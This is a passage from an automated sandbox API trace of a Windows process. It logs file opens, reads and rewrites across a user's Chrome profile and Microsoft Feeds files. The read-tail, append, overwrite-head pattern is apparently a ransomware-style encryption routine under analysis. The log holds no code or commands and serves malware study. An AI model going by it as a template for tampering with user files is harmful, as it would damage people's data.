hFile=0x1dc, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0154.584] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x30d4 [0154.584] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0154.810] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0154.810] WriteFile (in: hFile=0x1dc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0154.810] CloseHandle (hObject=0x1dc) returned 1 [0154.811] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0154.813] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0154.813] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x41bf [0154.813] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0154.813] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0154.813] ReleaseMutex (hMutex=0x168) returned 1 [0154.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0154.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0154.813] ReadFile (in: hFile=0x1dc, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0154.876] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x31bf [0154.876] ReadFile (in: hFile=0x1dc, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0154.926] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x31bf [0154.926] WriteFile (in: hFile=0x1dc, lpBuffer=0x289db08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x289db08*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0154.926] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0154.926] WriteFile (in: hFile=0x1dc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0154.927] CloseHandle (hObject=0x1dc) returned 1 [0154.927] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0154.928] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0154.928] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3fdc [0154.928] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0154.928] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0154.929] ReleaseMutex (hMutex=0x168) returned 1 [0154.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0154.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0154.929] ReadFile (in: hFile=0x1dc, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0154.930] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2fdc [0154.931] ReadFile (in: hFile=0x1dc, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0154.932] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2fdc [0154.932] WriteFile (in: hFile=0x1dc, lpBuffer=0x289bad8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x289bad8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0154.933] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0154.933] WriteFile (in: hFile=0x1dc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0154.933] CloseHandle (hObject=0x1dc) returned 1 [0154.934] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0154.935] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0154.935] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3e8b [0154.935] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0154.935] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0154.935] ReleaseMutex (hMutex=0x168) returned 1 [0154.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0154.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0154.936] ReadFile (in: hFile=0x1dc, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.018] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2e8b [0155.019] ReadFile (in: hFile=0x1dc, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.042] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2e8b [0155.042] WriteFile (in: hFile=0x1dc, lpBuffer=0x289cb08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x289cb08*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0155.043] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0155.043] WriteFile (in: hFile=0x1dc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0155.043] CloseHandle (hObject=0x1dc) returned 1 [0155.044] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0155.045] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0155.045] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3d72 [0155.045] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0155.045] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.045] ReleaseMutex (hMutex=0x168) returned 1 [0155.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0155.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0155.045] ReadFile (in: hFile=0x1dc, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.101] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2d72 [0155.101] ReadFile (in: hFile=0x1dc, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.145] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2d72 [0155.146] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0155.147] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0155.147] WriteFile (in: hFile=0x1dc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0155.147] CloseHandle (hObject=0x1dc) returned 1 [0155.148] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0155.150] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0155.150] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x29 [0155.150] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0155.150] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.150] ReleaseMutex (hMutex=0x168) returned 1 [0155.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MANIFEST-000001", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0155.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MANIFEST-000001", cchWideChar=15, lpMultiByteStr=0x1f733cc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MANIFEST-000001", lpUsedDefaultChar=0x0) returned 15 [0155.150] ReadFile (in: hFile=0x1dc, lpBuffer=0x1fa55f0, nNumberOfBytesToRead=0x29, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fa55f0*, lpNumberOfBytesRead=0x345f2bc*=0x29, lpOverlapped=0x0) returned 1 [0155.151] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0155.151] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5b1, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x345f2d0*=0x5b1, lpOverlapped=0x0) returned 1 [0155.152] CloseHandle (hObject=0x1dc) returned 1 [0155.152] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\readme"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0155.153] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0155.153] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xb4 [0155.153] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0155.154] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.154] ReleaseMutex (hMutex=0x168) returned 1 [0155.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="README", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0155.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="README", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="README", lpUsedDefaultChar=0x0) returned 6 [0155.154] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f37518, nNumberOfBytesToRead=0xb4, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37518*, lpNumberOfBytesRead=0x345f2bc*=0xb4, lpOverlapped=0x0) returned 1 [0155.155] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0155.156] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x63c, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x63c, lpOverlapped=0x0) returned 1 [0155.156] CloseHandle (hObject=0x1dc) returned 1 [0155.156] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\visited links"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0155.157] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0155.157] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x20000 [0155.157] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0155.157] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.157] ReleaseMutex (hMutex=0x168) returned 1 [0155.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Visited Links", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0155.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Visited Links", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Visited Links", lpUsedDefaultChar=0x0) returned 13 [0155.158] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0155.227] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1f000 [0155.228] ReadFile (in: hFile=0x1dc, lpBuffer=0x288a148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x288a148*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.244] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1f000 [0155.244] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0155.245] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0155.245] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0155.245] CloseHandle (hObject=0x1dc) returned 1 [0155.245] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0155.248] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0155.248] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x7000 [0155.248] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0155.249] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.249] ReleaseMutex (hMutex=0x168) returned 1 [0155.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft at Work~.feed-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0155.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft at Work~.feed-ms", cchWideChar=26, lpMultiByteStr=0x1f8fcfc, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft at Work~.feed-ms", lpUsedDefaultChar=0x0) returned 26 [0155.250] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.258] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x6000 [0155.258] ReadFile (in: hFile=0x1dc, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1000, 